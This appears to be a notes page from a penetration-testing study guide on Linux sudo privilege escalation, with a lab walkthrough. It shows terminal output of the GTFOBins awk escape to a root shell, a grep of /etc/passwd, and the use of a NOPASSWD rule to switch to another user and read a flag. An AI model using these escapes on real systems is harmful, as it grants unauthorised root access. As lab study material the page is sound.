SUDO

dsu@dsu-vm:~$ whoami
 dsu
dsu@dsu-vm:~$ sudo -l
 Matching Defaults entries for dsu on dsu-vm:
  env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/bin\:/snap/
 User dsu may run the following commands on dsu-vm:
  (ALL) NOPASSWD: /usr/bin/awk
dsu@dsu-vm:~$ which awk
 /usr/bin/awk
dsu@dsu-vm:~$ ls -l /usr/bin/awk
 lrwxrwxrwx 1 root root 21 Jan 11 2019 /usr/bin/awk -> /etc/alternatives/awk

root@oco:~$ BROWSER > https://gtfobins.github.io/
 search: awk
  Sudo
  If the binary is allowed to run as superuser by sudo, it does not drop the elevated 
  privileges and may be used to access the file system, escalate or maintain 
  privileged access.

  sudo awk 'BEGIN {system("/bin/sh")}'
   * ALT: sudo awk 'BEGIN {system("/bin/bash")}'
   
dsu@dsu-vm:~$ sudo awk 'BEGIN {system("/bin/bash")}'
root@dsu-vm:~# whoami
 root

user1@target:~$ cat /etc/passwd | grep -i "/bin/bash"
 root:x:0:0:root:/root:/bin/bash
 user1:x:1000:1000::/home/user1:/bin/bash
 user2:x:1001:1001::/home/user2:/bin/bash
 
user1@target:~$ sudo -l
Matching Defaults entries for user1 on ng-53539-gettingstartedprivesc-djiwb-55d7d8f7b-x8thd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on ng-53539-gettingstartedprivesc-djiwb-55d7d8f7b-x8thd:
    (user2 : user2) NOPASSWD: /bin/bash
    
 * The NOPASSWD entry shows that the /bin/bash command can be executed without
   a password

user1@target:~$ sudo -u user2 /bin/bash
user2target:~$ cat /home/user2/flag.txt 
 ...

PreviousSETUID NextVI

Last updated 1 month ago